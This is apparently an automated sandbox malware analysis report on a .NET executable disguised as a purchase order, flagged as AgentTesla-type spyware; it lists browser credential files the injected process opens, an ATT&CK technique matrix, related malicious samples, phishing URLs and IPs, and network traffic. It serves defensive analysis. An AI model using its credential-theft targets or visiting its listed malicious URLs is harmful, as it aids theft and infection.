            Source: C:\Users\user\Desktop\PO_CCTEB77.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\isoburn.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\isoburn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

            Remote Access Functionality

            Source: Yara match; File source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact | Resource Development | Reconnaissance
            Valid Accounts | Windows Management Instrumentation | Path Interception | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Abuse Accessibility Features | Acquire Infrastructure | Gather Victim Identity Information
            Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | SIM Card Swap | Obtain Device Cloud Backups | Network Denial of Service | Domains | Credentials
            Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 4 Non-Application Layer Protocol | | | Data Encrypted for Impact | DNS Server | Email Addresses
            Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Traffic Duplication | 4 Application Layer Protocol | | | Data Destruction | Virtual Private Server | Employee Names
            Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Scheduled Transfer | Fallback Channels | | | Data Encrypted for Impact | Server | Gather Victim Network Information
            Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Data Transfer Size Limits | Multiband Communication | | | Service Stop | Botnet | Domain Properties
            External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over C2 Channel | Commonly Used Port | | | Inhibit System Recovery | Web Services | DNS
            Source | Detection | Scanner | Label | Link
            PO_CCTEB77.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
            PO_CCTEB77.exe | 67% | Virustotal | | Browse
            PO_CCTEB77.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
              NameSourceMaliciousAntivirus DetectionReputation
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                          Joe Sandbox Version:38.0.0 Ammolite
                                                                          Analysis ID:1352162
                                                                          Start date and time:2023-12-02 18:46:19 +01:00
                                                                          Joe Sandbox Product:CloudBasic
                                                                          Overall analysis duration:0h 11m 21s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:8
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:2
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample file name:PO_CCTEB77.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@7/2@15/14
                                                                          EGA Information:
                                                                          • Successful, ratio: 75%
                                                                          HCA Information:
                                                                          • Successful, ratio: 94%
                                                                          • Number of executed functions: 204
                                                                          • Number of non-executed functions: 293
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
18:47:09 | API Interceptor | 18x Sleep call for process: PO_CCTEB77.exe modified
18:48:00 | API Interceptor | 10204816x Sleep call for process: isoburn.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                          • 34.149.198.43
                                                                          HSBC_Payment_Adice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 34.117.26.57
                                                                          Order_ID_DHL_0901P55AL.exeGet hashmaliciousFormBookBrowse
                                                                          • 34.149.198.43
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          SS-ASHUSHesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231128_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          https://tracking.solutiondynamics.com/?ApplicationId=SASES;cid=WRC&eid=65836714&jid=71771&event=clicked&ref=UpdateDetails&ref2=04361/434/00D&dest=http://livingbythestream.com/css/style/hguh1k/bruna.hom@uvic.catGet hashmaliciousHTMLPhisherBrowse
                                                                          • 131.153.44.120
                                                                          Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.148.82
                                                                          PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                          • 131.153.147.90
                                                                          file.exeGet hashmaliciousBazaLoaderBrowse
                                                                          • 131.153.152.122
                                                                          SecuriteInfo.com.Win32.TrojanX-gen.24405.26677.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.100.231
                                                                          https://drive.google.com/file/d/11qmYm6lCQxQsYSNvVMa92eUR4AcCAhCn/previewGet hashmaliciousUnknownBrowse
                                                                          • 198.24.171.52
                                                                          Quote#2310303384.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 131.153.100.231
                                                                          https://freefireenewgames.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 131.153.148.28
                                                                          https://freenetflixxaccontcom.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 23.235.251.211
                                                                          https://allezlens.fr/Get hashmaliciousUnknownBrowse
                                                                          • 131.153.148.26
                                                                          Food_Inquiry.exeGet hashmaliciousUnknownBrowse
                                                                          • 131.153.147.186
                                                                          Food_Inquiry.exeGet hashmaliciousUnknownBrowse
                                                                          • 131.153.147.186
                                                                          https://komposty.cz/.dps/index/myaccount/Get hashmaliciousUnknownBrowse
                                                                          • 131.153.242.59
                                                                          njvmboDs7W.exeGet hashmaliciousAmadey, Glupteba, RHADAMANTHYS, RedLineBrowse
                                                                          • 131.153.147.42
                                                                          temp.vbsGet hashmaliciousUnknownBrowse
                                                                          • 131.153.147.162
                                                                          https://pub-293ee7fa42274247834c50067ffbc67f.r2.dev/30zuth09clo23me.html#fcarron@amada.frGet hashmaliciousHTMLPhisherBrowse
                                                                          • 131.153.147.162
                                                                          TRANSIP-ASAmsterdamtheNetherlandsNLFpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • 37.97.254.27
                                                                          Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 37.97.254.27
                                                                          PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 37.97.254.27
                                                                          PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                          • 37.97.254.27
                                                                          file.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          kTnqWHyjjG.elfGet hashmaliciousMiraiBrowse
                                                                          • 95.170.75.142
                                                                          Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • 37.97.254.27
                                                                          ZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
                                                                          • 185.211.251.125
                                                                          F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                                                          • 37.97.214.109
                                                                          INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                                                          • 95.170.75.168
                                                                          NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 37.97.254.27
                                                                          003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                          • 37.97.254.27
                                                                          Document.exeGet hashmaliciousFormBookBrowse
                                                                          • 37.97.254.27
                                                                          ut3u2l5ZlK.elfGet hashmaliciousMiraiBrowse
                                                                          • 95.170.75.197
                                                                          sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                          • 149.210.216.118
                                                                          RF_-_ORDER_8990387_REQUEST.exeGet hashmaliciousFormBookBrowse
                                                                          • 86.105.245.69
                                                                          arm.elfGet hashmaliciousMiraiBrowse
                                                                          • 149.210.216.117
                                                                          No context
                                                                          No context
                                                                          Process:C:\Users\user\Desktop\PO_CCTEB77.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1415
                                                                          Entropy (8bit):5.352427679901606
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                          MD5:97AD91F1C1F572C945DA12233082171D
                                                                          SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                          SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                          SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                                          Process:C:\Windows\SysWOW64\isoburn.exe
                                                                          File Type:Unknown
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.121297215059106
                                                                          Encrypted:false
                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
Preview:SQLite format 3
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.382914605943906
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:PO_CCTEB77.exe
                                                                          File size:1'154'048 bytes
                                                                          MD5:7391f0c0a4cd63ecedef46dbb072542c
                                                                          SHA1:d48186b338445f25fc92c9aede867010be3c3b8f
                                                                          SHA256:5f409d66b5e4403f5c05ff19c88acd96d0ee3a0511c4ebca73abe01ced6eb5b6
                                                                          SHA512:582cc03750fa99361af605b4742a756354661effd900f6188bfa87997a9a06ed0c49e4d7f149393466f06d69d5a0cb89ceb76cec8c6203ff276f62af5915a9f1
                                                                          SSDEEP:24576:dMoF0IXV7bsXRvuARtoW7Q4JnGYfpBhtD/:y+7bGRvNRto+GY3
                                                                          TLSH:00358ED1F1948DDAE86F06F1BD2AA53011E37E9C54A4C10C5A99BB5B26F3342209FE1F
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6de..............0..............*... ...@....@.. ....................................@................................
                                                                          Icon Hash:aea4accc16a3d9be
                                                                          Entrypoint:0x4d2aee
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x656436DC [Mon Nov 27 06:27:40 2023 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xd2a99          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xd4000          0x48af0       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x11e000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xd04cc          0x54          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xd0af4 | 0xd0c00 | False | 0.9010198353293413 | data | 7.829988304712993 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xd4000 | 0x48af0 | 0x48c00 | False | 0.06330541237113402 | data | 4.770135185098519 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11e000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd42e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | | | 0.1798780487804878
RT_ICON | 0xd4948 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2513440860215054
RT_ICON | 0xd4c30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.3918918918918919
RT_ICON | 0xd4d58 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.3200959488272921
RT_ICON | 0xd5c00 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.33664259927797835
RT_ICON | 0xd64a8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.2622832369942196
RT_ICON | 0xd6a10 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | | | 0.04393141403083114
RT_ICON | 0x118a38 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.18786307053941909
RT_ICON | 0x11afe0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.2453095684803002
RT_ICON | 0x11c088 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.3484042553191489
RT_GROUP_ICON | 0x11c4f0 | 0x92 | data | | | 0.5753424657534246
RT_VERSION | 0x11c584 | 0x380 | data | | | 0.421875
RT_MANIFEST | 0x11c904 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          Dec 2, 2023 18:48:49.102222919 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.102375031 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.103190899 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.323198080 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.331998110 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.332020998 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.332082033 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.332695007 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.332712889 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.332782030 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.333327055 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.333342075 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.333409071 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.333837986 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.333853006 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.333909988 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.334444046 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.334462881 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.334518909 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.552076101 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.552097082 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.552189112 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.552439928 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.552454948 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.552498102 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.553086042 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.553102970 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.553142071 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.553576946 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.553591013 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.553642988 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.554229975 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.554244995 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.554280043 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.554888010 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.554902077 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.554936886 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.555393934 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.555406094 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.555538893 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.556181908 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.556195974 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.556272030 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.556699038 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.556713104 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.556765079 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.557029009 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.557189941 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.557229042 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.770263910 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.770292997 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.770343065 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.770495892 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.770541906 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.770584106 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.771045923 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.771105051 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.771145105 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:49.771397114 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.771410942 CET804973037.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:49.771459103 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:50.616755962 CET4973080192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:51.632689953 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:51.853128910 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:51.853327036 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:51.853564024 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.073494911 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.073931932 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.073950052 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074037075 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.074274063 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074290037 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074378967 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.074549913 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074608088 CET804973137.140.192.89192.168.2.5
                                                                          Dec 2, 2023 18:48:52.074651957 CET4973180192.168.2.537.140.192.89
                                                                          Dec 2, 2023 18:48:52.074980021 CET804973137.140.192.89192.168.2.5
